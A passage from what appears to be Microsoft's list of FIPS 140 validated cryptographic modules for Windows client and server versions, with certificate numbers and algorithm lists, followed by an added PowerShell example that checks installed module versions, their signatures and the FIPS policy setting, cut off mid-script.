    Validated Component Implementations: FIPS186-4 ECDSA - Signature Generation of hash sized messages (Cert. #288); FIPS186-4 RSA; PKCS#1 v2.1 - RSASP1 Signature Primitive (Cert. #289); SP800-135 - Section 4.1.1, IKEv1 Section 4.1.2, IKEv2 Section 4.2, TLS (Cert. #323)

Kernel Mode Cryptographic Primitives Library (cng.sys) | 6.3.9600, 6.3.9600.17042 | #2356
    FIPS Approved algorithms: AES (Cert. #2832); DRBG (Certs. #489); ECDSA (Cert. #505); HMAC (Cert. #1773); KAS (Cert. #47); KBKDF (Cert. #30); PBKDF (vendor affirmed); RSA (Certs. #1487, #1493 and #1519); SHS (Cert. #2373); Triple-DES (Cert. #1692)
    Other algorithms: AES (Cert. #2832, key wrapping; key establishment methodology provides between 128 and 256 bits of encryption strength); AES-GCM encryption (non-compliant); DES; HMAC MD5; Legacy CAPI KDF; MD2; MD4; MD5; NDRNG; RC2; RC4; RSA (encrypt/decrypt)
    Validated Component Implementations: FIPS186-4 ECDSA - Signature Generation of hash sized messages (Cert. #288); FIPS186-4 RSA; PKCS#1 v2.1 - RSASP1 Signature Primitive (Cert. #289)

Boot Manager | 6.3.9600, 6.3.9600.17031 | #2351
    FIPS Approved algorithms: AES (Cert. #2832); HMAC (Cert. #1773); PBKDF (vendor affirmed); RSA (Cert. #1494); SHS (Certs. #2373 and #2396)
    Other algorithms: MD5; KDF (non-compliant); PBKDF (non-compliant)

BitLocker® Windows OS Loader (winload) | 6.3.9600, 6.3.9600.17031 | #2352
    FIPS Approved algorithms: AES (Cert. #2832); RSA (Cert. #1494); SHS (Cert. #2396)
    Other algorithms: MD5; NDRNG

BitLocker® Windows Resume (winresume)[14] | 6.3.9600, 6.3.9600.17031 | #2353
    FIPS Approved algorithms: AES (Cert. #2832); RSA (Cert. #1494); SHS (Certs. #2373 and #2396)
    Other algorithms: MD5

BitLocker® Dump Filter (dumpfve.sys) | 6.3.9600, 6.3.9600.17031 | #2354
    FIPS Approved algorithms: AES (Cert. #2832)
    Other algorithms: N/A

Code Integrity (ci.dll) | 6.3.9600, 6.3.9600.17031 | #2355
    FIPS Approved algorithms: RSA (Cert. #1494); SHS (Cert. #2373)
    Other algorithms: MD5
    Validated Component Implementations: PKCS#1 v2.1 - RSASP1 Signature Primitive (Cert. #289)

[14] Applies only to Pro, Enterprise, and Embedded 8.


Windows 8

Validated Editions: RT, Home, Pro, Enterprise, Phone

Cryptographic Module | Version (link to Security Policy) | FIPS Certificate # | Algorithms

Cryptographic Primitives Library (BCRYPTPRIMITIVES.DLL) | 6.2.9200 | #1892
    FIPS Approved algorithms: AES (Certs. #2197 and #2216); DRBG (Certs. #258); DSA (Cert. #687); ECDSA (Cert. #341); HMAC (Cert. #1345); KAS (Cert. #36); KBKDF (Cert. #3); PBKDF (vendor affirmed); RSA (Certs. #1133 and #1134); SHS (Cert. #1903); Triple-DES (Cert. #1387)
    Other algorithms: AES (Cert. #2197, key wrapping; key establishment methodology provides between 128 and 256 bits of encryption strength); DES; Legacy CAPI KDF; MD2; MD4; MD5; HMAC MD5; RC2; RC4; RSA (encrypt/decrypt)

Kernel Mode Cryptographic Primitives Library (cng.sys) | 6.2.9200 | #1891
    FIPS Approved algorithms: AES (Certs. #2197 and #2216); DRBG (Certs. #258 and #259); ECDSA (Cert. #341); HMAC (Cert. #1345); KAS (Cert. #36); KBKDF (Cert. #3); PBKDF (vendor affirmed); RNG (Cert. #1110); RSA (Certs. #1133 and #1134); SHS (Cert. #1903); Triple-DES (Cert. #1387)
    Other algorithms: AES (Cert. #2197, key wrapping; key establishment methodology provides between 128 and 256 bits of encryption strength); DES; Legacy CAPI KDF; MD2; MD4; MD5; HMAC MD5; RC2; RC4; RSA (encrypt/decrypt)

Boot Manager | 6.2.9200 | #1895
    FIPS Approved algorithms: AES (Certs. #2196 and #2198); HMAC (Cert. #1347); RSA (Cert. #1132); SHS (Cert. #1903)
    Other algorithms: MD5

BitLocker® Windows OS Loader (WINLOAD) | 6.2.9200 | #1896
    FIPS Approved algorithms: AES (Certs. #2196 and #2198); RSA (Cert. #1132); SHS (Cert. #1903)
    Other algorithms: AES (Cert. #2197; non-compliant); MD5; Non-Approved RNG

BitLocker® Windows Resume (WINRESUME)[15] | 6.2.9200 | #1898
    FIPS Approved algorithms: AES (Certs. #2196 and #2198); RSA (Cert. #1132); SHS (Cert. #1903)
    Other algorithms: MD5

BitLocker® Dump Filter (DUMPFVE.SYS) | 6.2.9200 | #1899
    FIPS Approved algorithms: AES (Certs. #2196 and #2198)
    Other algorithms: N/A

Code Integrity (CI.DLL) | 6.2.9200 | #1897
    FIPS Approved algorithms: RSA (Cert. #1132); SHS (Cert. #1903)
    Other algorithms: MD5

Enhanced DSS and Diffie-Hellman Cryptographic Provider (DSSENH.DLL) | 6.2.9200 | #1893
    FIPS Approved algorithms: DSA (Cert. #686); SHS (Cert. #1902); Triple-DES (Cert. #1386); Triple-DES MAC (Triple-DES Cert. #1386, vendor affirmed)
    Other algorithms: DES; DES MAC; DES40; DES40 MAC; Diffie-Hellman; MD5; RC2; RC2 MAC; RC4; Triple-DES (Cert. #1386, key wrapping; key establishment methodology provides 112 bits of encryption strength; non-compliant less than 112 bits of encryption strength)

Enhanced Cryptographic Provider (RSAENH.DLL) | 6.2.9200 | #1894
    FIPS Approved algorithms: AES (Cert. #2196); HMAC (Cert. #1346); RSA (Cert. #1132); SHS (Cert. #1902); Triple-DES (Cert. #1386)
    Other algorithms: AES (Cert. #2196, key wrapping; key establishment methodology provides between 128 and 256 bits of encryption strength); DES; MD2; MD4; MD5; RC2; RC4; RSA (key wrapping; key establishment methodology provides between 112 and 150 bits of encryption strength; non-compliant less than 112 bits of encryption strength); Triple-DES (Cert. #1386, key wrapping; key establishment methodology provides 112 bits of encryption strength; non-compliant less than 112 bits of encryption strength)

[15] Applies only to Home and Pro


Windows 7
Validated Editions: Windows 7, Windows 7 SP1

Cryptographic Module: Cryptographic Primitives Library (BCRYPTPRIMITIVES.DLL)
Version (link to Security Policy): 6.1.7600.16385 and 6.1.7601.17514
FIPS Certificate #: 1329
FIPS Approved algorithms: AES (Certs. #1168 and #1178); AES GCM (Cert. #1168, vendor-affirmed); AES GMAC (Cert. #1168, vendor-affirmed); DRBG (Certs. #23 and #24); DSA (Cert. #386); ECDSA (Cert. #141); HMAC (Cert. #677); KAS (SP 800-56A, vendor affirmed, key agreement; key establishment methodology provides 80 to 256 bits of encryption strength); RNG (Cert. #649); RSA (Certs. #559 and #560); SHS (Cert. #1081); Triple-DES (Cert. #846)
Other algorithms: AES (Cert. #1168, key wrapping; key establishment methodology provides between 128 and 256 bits of encryption strength); DES; Diffie-Hellman (key agreement; key establishment methodology provides between 112 and 150 bits of encryption strength; non-compliant less than 112 bits of encryption strength); MD2; MD4; MD5; HMAC MD5; RC2; RC4

Cryptographic Module: Kernel Mode Cryptographic Primitives Library (cng.sys)
Version (link to Security Policy): 6.1.7600.16385, 6.1.7600.16915, 6.1.7600.21092, 6.1.7601.17514, 6.1.7601.17725, 6.1.7601.17919, 6.1.7601.21861 and 6.1.7601.22076
FIPS Certificate #: 1328
FIPS Approved algorithms: AES (Certs. #1168 and #1178); AES GCM (Cert. #1168, vendor-affirmed); AES GMAC (Cert. #1168, vendor-affirmed); DRBG (Certs. #23 and #24); ECDSA (Cert. #141); HMAC (Cert. #677); KAS (SP 800-56A, vendor affirmed, key agreement; key establishment methodology provides 80 to 256 bits of encryption strength); RNG (Cert. #649); RSA (Certs. #559 and #560); SHS (Cert. #1081); Triple-DES (Cert. #846)
Other algorithms: AES (Cert. #1168, key wrapping; key establishment methodology provides between 128 and 256 bits of encryption strength); DES; Diffie-Hellman (key agreement; key establishment methodology provides between 112 and 150 bits of encryption strength; non-compliant less than 112 bits of encryption strength); MD2; MD4; MD5; HMAC MD5; RC2; RC4

Cryptographic Module: Boot Manager
Version (link to Security Policy): 6.1.7600.16385 and 6.1.7601.17514
FIPS Certificate #: 1319
FIPS Approved algorithms: AES (Certs. #1168 and #1177); HMAC (Cert. #675); RSA (Cert. #557); SHS (Cert. #1081)
Other algorithms: MD5

Cryptographic Module: Winload OS Loader (winload.exe)
Version (link to Security Policy): 6.1.7600.16385, 6.1.7600.16757, 6.1.7600.20897, 6.1.7600.20916, 6.1.7601.17514, 6.1.7601.17556, 6.1.7601.21655 and 6.1.7601.21675
FIPS Certificate #: 1326
FIPS Approved algorithms: AES (Certs. #1168 and #1177); RSA (Cert. #557); SHS (Cert. #1081)
Other algorithms: MD5

Cryptographic Module: BitLocker™ Drive Encryption
Version (link to Security Policy): 6.1.7600.16385, 6.1.7600.16429, 6.1.7600.16757, 6.1.7600.20536, 6.1.7600.20873, 6.1.7600.20897, 6.1.7600.20916, 6.1.7601.17514, 6.1.7601.17556, 6.1.7601.21634, 6.1.7601.21655 and 6.1.7601.21675
FIPS Certificate #: 1332
FIPS Approved algorithms: AES (Certs. #1168 and #1177); HMAC (Cert. #675); SHS (Cert. #1081)
Other algorithms: Elephant Diffuser

Cryptographic Module: Code Integrity (CI.DLL)
Version (link to Security Policy): 6.1.7600.16385, 6.1.7600.17122, 6.1.7600.21320, 6.1.7601.17514, 6.1.7601.17950 and 6.1.7601.22108
FIPS Certificate #: 1327
FIPS Approved algorithms: RSA (Cert. #557); SHS (Cert. #1081)
Other algorithms: MD5

Cryptographic Module: Enhanced DSS and Diffie-Hellman Cryptographic Provider (DSSENH.DLL)
Version (link to Security Policy): 6.1.7600.16385 (no change in SP1)
FIPS Certificate #: 1331
FIPS Approved algorithms: DSA (Cert. #385); RNG (Cert. #649); SHS (Cert. #1081); Triple-DES (Cert. #846); Triple-DES MAC (Triple-DES Cert. #846, vendor affirmed)
Other algorithms: DES; DES MAC; DES40; DES40 MAC; Diffie-Hellman; MD5; RC2; RC2 MAC; RC4

Cryptographic Module: Enhanced Cryptographic Provider (RSAENH.DLL)
Version (link to Security Policy): 6.1.7600.16385 (no change in SP1)
FIPS Certificate #: 1330
FIPS Approved algorithms: AES (Cert. #1168); DRBG (Cert. #23); HMAC (Cert. #673); SHS (Cert. #1081); RSA (Certs. #557 and #559); Triple-DES (Cert. #846)
Other algorithms: DES; MD2; MD4; MD5; RC2; RC4; RSA (key wrapping; key establishment methodology provides between 112 and 256 bits of encryption strength; non-compliant less than 112 bits of encryption strength)

Windows Vista SP1

Validated Editions: Ultimate Edition

Cryptographic Module: Boot Manager (bootmgr)
Version (link to Security Policy): 6.0.6001.18000 and 6.0.6002.18005
FIPS Certificate #: 978
FIPS Approved algorithms: AES (Certs. #739 and #760); HMAC (Cert. #415); RSA (Cert. #354); SHS (Cert. #753)

Cryptographic Module: Winload OS Loader (winload.exe)
Version (link to Security Policy): 6.0.6001.18000, 6.0.6001.18027, 6.0.6001.18606, 6.0.6001.22125, 6.0.6001.22861, 6.0.6002.18005, 6.0.6002.18411 and 6.0.6002.22596
FIPS Certificate #: 979
FIPS Approved algorithms: AES (Certs. #739 and #760); RSA (Cert. #354); SHS (Cert. #753)
Other algorithms: MD5

Cryptographic Module: Code Integrity (ci.dll)
Version (link to Security Policy): 6.0.6001.18000, 6.0.6001.18023, 6.0.6001.22120 and 6.0.6002.18005
FIPS Certificate #: 980
FIPS Approved algorithms: RSA (Cert. #354); SHS (Cert. #753)
Other algorithms: MD5

Cryptographic Module: Kernel Mode Security Support Provider Interface (ksecdd.sys)
Version (link to Security Policy): 6.0.6001.18709, 6.0.6001.18272, 6.0.6001.18796, 6.0.6001.22202, 6.0.6001.22450, 6.0.6001.22987, 6.0.6001.23069, 6.0.6002.18005, 6.0.6002.18051, 6.0.6002.18541, 6.0.6002.18643, 6.0.6002.22152, 6.0.6002.22742 and 6.0.6002.22869
FIPS Certificate #: 1000
FIPS Approved algorithms: AES (Certs. #739 and #756); ECDSA (Cert. #82); HMAC (Cert. #412); RNG (Cert. #435 and SP 800-90 AES-CTR, vendor-affirmed); RSA (Certs. #353 and #357); SHS (Cert. #753); Triple-DES (Cert. #656)
Other algorithms: AES (GCM and GMAC; non-compliant); DES; Diffie-Hellman (key agreement; key establishment methodology provides between 112 and 150 bits of encryption strength; non-compliant less than 112 bits of encryption strength); EC Diffie-Hellman (key agreement; key establishment methodology provides between 128 and 256 bits of encryption strength); MD2; MD4; MD5; HMAC MD5; RC2; RC4; RNG (SP 800-90 Dual-EC; non-compliant); RSA (key wrapping; key establishment methodology provides between 112 and 150 bits of encryption strength; non-compliant less than 112 bits of encryption strength)

Cryptographic Module: Cryptographic Primitives Library (bcrypt.dll)
Version (link to Security Policy): 6.0.6001.22202, 6.0.6002.18005 and 6.0.6002.22872
FIPS Certificate #: 1001
FIPS Approved algorithms: AES (Certs. #739 and #756); DSA (Cert. #283); ECDSA (Cert. #82); HMAC (Cert. #412); RNG (Cert. #435 and SP 800-90, vendor affirmed); RSA (Certs. #353 and #357); SHS (Cert. #753); Triple-DES (Cert. #656)
Other algorithms: AES (GCM and GMAC; non-compliant); DES; Diffie-Hellman (key agreement; key establishment methodology provides between 112 and 150 bits of encryption strength; non-compliant less than 112 bits of encryption strength); EC Diffie-Hellman (key agreement; key establishment methodology provides between 128 and 256 bits of encryption strength); MD2; MD4; MD5; RC2; RC4; RNG (SP 800-90 Dual-EC; non-compliant); RSA (key wrapping; key establishment methodology provides between 112 and 150 bits of encryption strength; non-compliant provides less than 112 bits of encryption strength)

Cryptographic Module: Enhanced Cryptographic Provider (RSAENH)
Version (link to Security Policy): 6.0.6001.22202 and 6.0.6002.18005
FIPS Certificate #: 1002
FIPS Approved algorithms: AES (Cert. #739); HMAC (Cert. #407); RNG (SP 800-90, vendor affirmed); RSA (Certs. #353 and #354); SHS (Cert. #753); Triple-DES (Cert. #656)
Other algorithms: DES; MD2; MD4; MD5; RC2; RC4; RSA (key wrapping; key establishment methodology provides between 112 and 150 bits of encryption strength; non-compliant less than 112 bits of encryption strength)

Cryptographic Module: Enhanced DSS and Diffie-Hellman Cryptographic Provider (DSSENH)
Version (link to Security Policy): 6.0.6001.18000 and 6.0.6002.18005
FIPS Certificate #: 1003
FIPS Approved algorithms: DSA (Cert. #281); RNG (Cert. #435); SHS (Cert. #753); Triple-DES (Cert. #656); Triple-DES MAC (Triple-DES Cert. #656, vendor affirmed)
Other algorithms: DES; DES MAC; DES40; DES40 MAC; Diffie-Hellman (key agreement; key establishment methodology provides between 112 and 150 bits of encryption strength; non-compliant less than 112 bits of encryption strength); MD5; RC2; RC2 MAC; RC4

Windows Vista

Validated Editions: Ultimate Edition

Cryptographic Module: Enhanced Cryptographic Provider (RSAENH)
Version (link to Security Policy): 6.0.6000.16386
FIPS Certificate #: 893
FIPS Approved algorithms: AES (Cert. #553); HMAC (Cert. #297); RNG (Cert. #321); RSA (Certs. #255 and #258); SHS (Cert. #618); Triple-DES (Cert. #549)
Other algorithms: DES; MD2; MD4; MD5; RC2; RC4; RSA (key wrapping; key establishment methodology provides between 112 and 150 bits of encryption strength; non-compliant less than 112 bits of encryption strength)

Cryptographic Module: Enhanced DSS and Diffie-Hellman Cryptographic Provider (DSSENH)
Version (link to Security Policy): 6.0.6000.16386
FIPS Certificate #: 894
FIPS Approved algorithms: DSA (Cert. #226); RNG (Cert. #321); SHS (Cert. #618); Triple-DES (Cert. #549); Triple-DES MAC (Triple-DES Cert. #549, vendor affirmed)
Other algorithms: DES; DES MAC; DES40; DES40 MAC; Diffie-Hellman (key agreement; key establishment methodology provides between 112 and 150 bits of encryption strength; non-compliant less than 112 bits of encryption strength); MD5; RC2; RC2 MAC; RC4

Cryptographic Module: BitLocker™ Drive Encryption
Version (link to Security Policy): 6.0.6000.16386
FIPS Certificate #: 947
FIPS Approved algorithms: AES (Cert. #715); HMAC (Cert. #386); SHS (Cert. #737)
Other algorithms: Elephant Diffuser

Cryptographic Module: Kernel Mode Security Support Provider Interface (ksecdd.sys)
Version (link to Security Policy): 6.0.6000.16386, 6.0.6000.16870 and 6.0.6000.21067
FIPS Certificate #: 891
FIPS Approved algorithms: AES (Cert. #553); ECDSA (Cert. #60); HMAC (Cert. #298); RNG (Cert. #321); RSA (Certs. #257 and #258); SHS (Cert. #618); Triple-DES (Cert. #549)
Other algorithms: DES; Diffie-Hellman (key agreement; key establishment methodology provides between 112 and 150 bits of encryption strength; non-compliant less than 112 bits of encryption strength); EC Diffie-Hellman (key agreement; key establishment methodology provides 128 to 256 bits of encryption strength); MD2; MD4; MD5; RC2; RC4; HMAC MD5

Windows XP SP3

Cryptographic Module: Kernel Mode Cryptographic Module (FIPS.SYS)
Version (link to Security Policy): 5.1.2600.5512
FIPS Certificate #: 997
FIPS Approved algorithms: HMAC (Cert. #429); RNG (Cert. #449); SHS (Cert. #785); Triple-DES (Cert. #677); Triple-DES MAC (Triple-DES Cert. #677, vendor affirmed)
Other algorithms: DES; MD5; HMAC MD5

Cryptographic Module: Enhanced DSS and Diffie-Hellman Cryptographic Provider (DSSENH)
Version (link to Security Policy): 5.1.2600.5507
FIPS Certificate #: 990
FIPS Approved algorithms: DSA (Cert. #292); RNG (Cert. #448); SHS (Cert. #784); Triple-DES (Cert. #676); Triple-DES MAC (Triple-DES Cert. #676, vendor affirmed)
Other algorithms: DES; DES40; Diffie-Hellman (key agreement; key establishment methodology provides between 112 and 150 bits of encryption strength; non-compliant less than 112 bits); MD5; RC2; RC4

Cryptographic Module: Enhanced Cryptographic Provider (RSAENH)
Version (link to Security Policy): 5.1.2600.5507
FIPS Certificate #: 989
FIPS Approved algorithms: AES (Cert. #781); HMAC (Cert. #428); RNG (Cert. #447); RSA (Cert. #371); SHS (Cert. #783); Triple-DES (Cert. #675); Triple-DES MAC (Triple-DES Cert. #675, vendor affirmed)
Other algorithms: DES; MD2; MD4; MD5; HMAC MD5; RC2; RC4; RSA (key wrapping; key establishment methodology provides between 112 and 150 bits of encryption strength; non-compliant less than 112 bits)

Windows XP SP2

Cryptographic Module: DSS/Diffie-Hellman Enhanced Cryptographic Provider
Version (link to Security Policy): 5.1.2600.2133
FIPS Certificate #: 240
FIPS Approved algorithms: Triple-DES (Cert. #16); DSA/SHA-1 (Cert. #29)
Other algorithms: DES (Cert. #66); RC2; RC4; MD5; DES40; Diffie-Hellman (key agreement)

Cryptographic Module: Microsoft Enhanced Cryptographic Provider
Version (link to Security Policy): 5.1.2600.2161
FIPS Certificate #: 238
FIPS Approved algorithms: Triple-DES (Cert. #81); AES (Cert. #33); SHA-1 (Cert. #83); RSA (PKCS#1, vendor affirmed); HMAC-SHA-1 (Cert. #83, vendor affirmed)
Other algorithms: DES (Cert. #156); RC2; RC4; MD5

Windows XP SP1

Cryptographic Module: Microsoft Enhanced Cryptographic Provider
Version (link to Security Policy): 5.1.2600.1029
FIPS Certificate #: 238
FIPS Approved algorithms: Triple-DES (Cert. #81); AES (Cert. #33); SHA-1 (Cert. #83); RSA (PKCS#1, vendor affirmed); HMAC-SHA-1 (Cert. #83, vendor affirmed)
Other algorithms: DES (Cert. #156); RC2; RC4; MD5

Windows XP

Cryptographic Module: Kernel Mode Cryptographic Module
Version (link to Security Policy): 5.1.2600.0
FIPS Certificate #: 241
FIPS Approved algorithms: Triple-DES (Cert. #16); DSA/SHA-1 (Cert. #35); HMAC-SHA-1 (Cert. #35, vendor affirmed)
Other algorithms: DES (Cert. #89)

Windows 2000 SP3

Cryptographic Module: Kernel Mode Cryptographic Module (FIPS.SYS)
Version (link to Security Policy): 5.0.2195.1569
FIPS Certificate #: 106
FIPS Approved algorithms: Triple-DES (Cert. #16); SHA-1 (Certs. #35)
Other algorithms: DES (Certs. #89)

Cryptographic Module: Base DSS Cryptographic Provider, Base Cryptographic Provider, DSS/Diffie-Hellman Enhanced Cryptographic Provider, and Enhanced Cryptographic Provider
Version (link to Security Policy): Base DSS: 5.0.2195.3665 [SP3]; Base: 5.0.2195.3839 [SP3]; DSS/DH Enh: 5.0.2195.3665 [SP3]; Enh: 5.0.2195.3839 [SP3]
FIPS Certificate #: 103
FIPS Approved algorithms: Triple-DES (Cert. #16); DSA/SHA-1 (Certs. #28 and #29); RSA (vendor affirmed)
Other algorithms: DES (Certs. #65, 66, 67 and 68); Diffie-Hellman (key agreement); RC2; RC4; MD2; MD4; MD5

Windows 2000 SP2

Cryptographic Module: Kernel Mode Cryptographic Module (FIPS.SYS)
Version (link to Security Policy): 5.0.2195.1569
FIPS Certificate #: 106
FIPS Approved algorithms: Triple-DES (Cert. #16); SHA-1 (Certs. #35)
Other algorithms: DES (Certs. #89)

Cryptographic Module: Base DSS Cryptographic Provider, Base Cryptographic Provider, DSS/Diffie-Hellman Enhanced Cryptographic Provider, and Enhanced Cryptographic Provider
Version (link to Security Policy): Base DSS: 5.0.2195.2228 [SP2]; Base: 5.0.2195.2228 [SP2]; DSS/DH Enh: 5.0.2195.2228 [SP2]; Enh: 5.0.2195.2228 [SP2]
FIPS Certificate #: 103
FIPS Approved algorithms: Triple-DES (Cert. #16); DSA/SHA-1 (Certs. #28 and #29); RSA (vendor affirmed)
Other algorithms: DES (Certs. #65, 66, 67 and 68); Diffie-Hellman (key agreement); RC2; RC4; MD2; MD4; MD5

Windows 2000 SP1

Cryptographic Module: Base DSS Cryptographic Provider, Base Cryptographic Provider, DSS/Diffie-Hellman Enhanced Cryptographic Provider, and Enhanced Cryptographic Provider
Version (link to Security Policy): Base DSS: 5.0.2150.1391 [SP1]; Base: 5.0.2150.1391 [SP1]; DSS/DH Enh: 5.0.2150.1391 [SP1]; Enh: 5.0.2150.1391 [SP1]
FIPS Certificate #: 103
FIPS Approved algorithms: Triple-DES (Cert. #16); DSA/SHA-1 (Certs. #28 and #29); RSA (vendor affirmed)
Other algorithms: DES (Certs. #65, 66, 67 and 68); Diffie-Hellman (key agreement); RC2; RC4; MD2; MD4; MD5

Windows 2000

Cryptographic Module: Base DSS Cryptographic Provider, Base Cryptographic Provider, DSS/Diffie-Hellman Enhanced Cryptographic Provider, and Enhanced Cryptographic Provider
Version (link to Security Policy): 5.0.2150.1
FIPS Certificate #: 76
FIPS Approved algorithms: Triple-DES (vendor affirmed); DSA/SHA-1 (Certs. #28 and 29); RSA (vendor affirmed)
Other algorithms: DES (Certs. #65, 66, 67 and 68); RC2; RC4; MD2; MD4; MD5; Diffie-Hellman (key agreement)

Windows 95 and Windows 98

Cryptographic Module: Base DSS Cryptographic Provider, Base Cryptographic Provider, DSS/Diffie-Hellman Enhanced Cryptographic Provider, and Enhanced Cryptographic Provider
Version (link to Security Policy): 5.0.1877.6 and 5.0.1877.7
FIPS Certificate #: 75
FIPS Approved algorithms: Triple-DES (vendor affirmed); SHA-1 (Certs. #20 and 21); DSA/SHA-1 (Certs. #25 and 26); RSA (vendor-affirmed)
Other algorithms: DES (Certs. #61, 62, 63 and 64); RC2; RC4; MD2; MD4; MD5; Diffie-Hellman (key agreement)

Windows NT 4.0

Cryptographic Module: Base Cryptographic Provider
Version (link to Security Policy): 5.0.1877.6 and 5.0.1877.7
FIPS Certificate #: 68
FIPS Approved algorithms: SHA-1 (Certs. #20 and 21); DSA/SHA-1 (Certs. #25 and 26); RSA (vendor affirmed)
Other algorithms: DES (Certs. #61, 62, 63 and 64); Triple-DES (allowed for US and Canadian Government use); RC2; RC4; MD2; MD4; MD5; Diffie-Hellman (key agreement)

Windows Server
Windows Server 2016

Validated Editions: Standard, Datacenter, Storage Server

Cryptographic Module: Cryptographic Primitives Library (bcryptprimitives.dll and ncryptsslp.dll)
Version (link to Security Policy): 10.0.14393
FIPS Certificate #: 2937
FIPS Approved algorithms: AES (Cert. #4064); DRBG (Cert. #1217); DSA (Cert. #1098); ECDSA (Cert. #911); HMAC (Cert. #2651); KAS (Cert. #92); KBKDF (Cert. #101); KTS (AES Cert. #4062; key wrapping; key establishment methodology provides between 128 and 256 bits of encryption strength); PBKDF (vendor affirmed); RSA (Certs. #2192, #2193 and #2195); SHS (Cert. #3347); Triple-DES (Cert. #2227)
Other algorithms: HMAC-MD5; MD5; DES; Legacy CAPI KDF; MD2; MD4; RC2; RC4; RSA (encrypt/decrypt)

Cryptographic Module: Kernel Mode Cryptographic Primitives Library (cng.sys)
Version (link to Security Policy): 10.0.14393
FIPS Certificate #: 2936
FIPS Approved algorithms: AES (Cert. #4064); DRBG (Cert. #1217); DSA (Cert. #1098); ECDSA (Cert. #911); HMAC (Cert. #2651); KAS (Cert. #92); KBKDF (Cert. #101); KTS (AES Cert. #4062; key wrapping; key establishment methodology provides between 128 and 256 bits of encryption strength); PBKDF (vendor affirmed); RSA (Certs. #2192, #2193 and #2195); SHS (Cert. #3347); Triple-DES (Cert. #2227)
Other algorithms: HMAC-MD5; MD5; NDRNG; DES; Legacy CAPI KDF; MD2; MD4; RC2; RC4; RSA (encrypt/decrypt)

Cryptographic Module: Boot Manager
Version (link to Security Policy): 10.0.14393
FIPS Certificate #: 2931
FIPS Approved algorithms: AES (Certs. #4061 and #4064); HMAC (Cert. #2651); PBKDF (vendor affirmed); RSA (Cert. #2193); SHS (Cert. #3347)
Other algorithms: MD5; PBKDF (non-compliant); VMK KDF

Cryptographic Module: BitLocker® Windows OS Loader (winload)
Version (link to Security Policy): 10.0.14393
FIPS Certificate #: 2932
FIPS Approved algorithms: AES (Certs. #4061 and #4064); RSA (Cert. #2193); SHS (Cert. #3347)
Other algorithms: NDRNG; MD5

Cryptographic Module: BitLocker® Windows Resume (winresume)
Version (link to Security Policy): 10.0.14393
FIPS Certificate #: 2933
FIPS Approved algorithms: AES (Certs. #4061 and #4064); RSA (Cert. #2193); SHS (Cert. #3347)
Other algorithms: MD5

Cryptographic Module: BitLocker® Dump Filter (dumpfve.sys)
Version (link to Security Policy): 10.0.14393
FIPS Certificate #: 2934
FIPS Approved algorithms: AES (Certs. #4061 and #4064)

Cryptographic Module: Code Integrity (ci.dll)
Version (link to Security Policy): 10.0.14393
FIPS Certificate #: 2935
FIPS Approved algorithms: RSA (Cert. #2193); SHS (Cert. #3347)
Other algorithms: AES (non-compliant); MD5

Cryptographic Module: Secure Kernel Code Integrity (skci.dll)
Version (link to Security Policy): 10.0.14393
FIPS Certificate #: 2938
FIPS Approved algorithms: RSA (Certs. #2193); SHS (Certs. #3347)
Other algorithms: MD5
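The table only tells you which module versions were validated; it says nothing about what is actually running on a given host. The following PowerShell check is an added example, not code from this page or from Microsoft: it reads the PE version resource of the Windows Server 2016 module binaries named above, compares the major.minor.build against the validated 10.0.14393, confirms each file carries a valid Microsoft Authenticode signature, and reports whether the FipsAlgorithmPolicy switch is on. The file paths, the choice to ignore the revision number, and the omission of the boot-volume modules (Boot Manager, winload, winresume) are this example's own assumptions; the certificate's Security Policy remains the authority on exactly which file versions are covered.

```powershell
# Added example, not code from the Microsoft page: confirm that the cryptographic
# module binaries on a Windows Server 2016 host carry the build the table lists as
# validated (10.0.14393) and that the FIPS algorithm policy is actually switched on.
# Assumptions (this example's own, not from the table): the file paths below, and the
# major.minor.build comparison; the module's Security Policy is the authority on
# the exact validated file versions.

# Module binaries named in the Windows Server 2016 table, with their certificate numbers.
# Boot Manager, winload and winresume live on the boot/EFI volume and are left out here.
$Server2016Modules = @(
    [pscustomobject]@{ Cert = 2937; Path = "$env:SystemRoot\System32\bcryptprimitives.dll" }
    [pscustomobject]@{ Cert = 2937; Path = "$env:SystemRoot\System32\ncryptsslp.dll" }
    [pscustomobject]@{ Cert = 2936; Path = "$env:SystemRoot\System32\drivers\cng.sys" }
    [pscustomobject]@{ Cert = 2934; Path = "$env:SystemRoot\System32\drivers\dumpfve.sys" }
    [pscustomobject]@{ Cert = 2935; Path = "$env:SystemRoot\System32\ci.dll" }
    [pscustomobject]@{ Cert = 2938; Path = "$env:SystemRoot\System32\skci.dll" }
)

# Version column of the Windows Server 2016 table.
$ValidatedBuild = [version]'10.0.14393'

function Test-FipsAlgorithmPolicy {
    # The FIPS mode switch Windows reads at boot:
    # HKLM\SYSTEM\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy\Enabled = 1
    $key  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy'
    $item = Get-ItemProperty -Path $key -Name Enabled -ErrorAction SilentlyContinue
    return ($null -ne $item -and [int]$item.Enabled -eq 1)
}

function Test-ValidatedModule {
    param(
        [Parameter(Mandatory)][string]$Path,
        [Parameter(Mandatory)][int]$Cert,
        [Parameter(Mandatory)][version]$Build
    )
    $result = [ordered]@{
        Module            = Split-Path -Leaf $Path
        Cert              = $Cert
        FileVersion       = $null
        BuildMatches      = $false
        SignedByMicrosoft = $false
        Note              = ''
    }
    if (-not (Test-Path -LiteralPath $Path)) {
        $result.Note = 'file not found'
        return [pscustomobject]$result
    }

    # Fixed version resource of the PE file. The FileVersion display string can carry
    # a branch suffix, so compare the numeric parts rather than the string.
    $vi = (Get-Item -LiteralPath $Path).VersionInfo
    $result.FileVersion  = '{0}.{1}.{2}.{3}' -f $vi.FileMajorPart, $vi.FileMinorPart, $vi.FileBuildPart, $vi.FilePrivatePart
    $result.BuildMatches = ($vi.FileMajorPart -eq $Build.Major -and
                            $vi.FileMinorPart -eq $Build.Minor -and
                            $vi.FileBuildPart -eq $Build.Build)

    # A validated version number on an unsigned or tampered file proves nothing:
    # require a valid Authenticode chain whose signer is Microsoft.
    $sig = Get-AuthenticodeSignature -FilePath $Path
    $result.SignedByMicrosoft = ($sig.Status -eq 'Valid' -and
                                 $sig.SignerCertificate.Subject -like '*O=Microsoft Corporation*')
    if (-not $result.BuildMatches) { $result.Note = "build differs from validated $Build" }
    return [pscustomobject]$result
}

$report = foreach ($m in $Server2016Modules) {
    Test-ValidatedModule -Path $m.Path -Cert $m.Cert -Build $ValidatedBuild
}
$report | Format-Table -AutoSize

if (Test-FipsAlgorithmPolicy) {
    'FIPS algorithm policy: enabled'
} else {
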